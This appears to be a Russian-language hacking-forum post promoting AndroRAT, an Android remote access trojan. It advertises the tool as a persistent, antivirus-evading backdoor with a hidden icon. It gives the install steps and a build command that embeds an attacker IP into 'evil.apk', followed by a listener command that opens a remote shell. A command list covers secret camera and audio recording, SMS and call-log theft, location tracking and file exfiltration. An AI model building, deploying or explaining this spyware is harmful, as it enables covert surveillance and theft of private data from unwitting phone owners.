AndroRat

[Nilebaxuha]

​

AndroRAT - это инструмент, предназначенный для удаленного управления системой Android и получения от нее информации. Androrat - это клиент-серверное приложение, разработанное на Java Android для клиентской стороны, а сервер - на Python.

AndroRAT будет работать на устройствах с Android 4.1 (Jelly Bean) до Android 9.0 (Oreo) (от API 16 до API 28).

AndroRAT также работает на Android 10 (Q), но некоторые команды интерпретатора будут нестабильными.

​

Особенности AndroRAT

• Постоянный бэкдор ​
• Полностью не обнаруживается любым антивирусным сканером (VirusTotal) ​
• Невидимый значок при установке ​
• Легкий apk, который работает 24 * 7 в фоновом режиме​
• Приложение запускается автоматически при загрузке​
• Может записывать аудио, видео, делать снимки с обеих камер ​
• Просматривайте журналы вызовов и журналы SMS ​
• Получить текущее местоположение, данные сим-карты, ip, mac-адрес устройства ​

Зависимости
AndroRAT требует Python (> 3.6) и JAVA 8 (или Android Studio)

Установка

git clone https://github.com/karma9874/AndroRAT.git
pip install colorama

Возможные режимы:
--build - для создания apk android
--shell -получение интерактивной оболочки устройства

build mode

Usage:
  python androRAT.py --build [flags]
  Flags:
    -i, --ip                Attacker IP address (required)
    -p, --port              Attacker port number (required)
    -o, --output            Name for the apk file (optional)

Или вы можете вручную создать apk, импортировав папку Android Code в Android Studio и изменив IP-адрес и номер порта в файле config.java, а затем вы можете сгенерировать подписанный apk из Android Studio -> Build -> Generate Signed APK (s)

shell mode

Usage:
  python androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

После запуска режима оболочки вы получите интерпретатор устройства

Команды, которые можно запускать в интерпретаторе

   deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID 
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

В оболочке sh есть несколько подкоманд

 get [full_file_path]        --> donwloads the file to the local machine (file size upto 15mb)
    put [filename]              --> uploads the file to the android device

Пример выполнения:
Чтобы собрать apk:

python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk

Что бы получить интепретатор:

python androRAT.py --shell -i 0.0.0.0 -p 8000

Пример интерпретатора

Создание APK

Некторые команды интерпретатора

СКАЧАТЬ С GITHUB​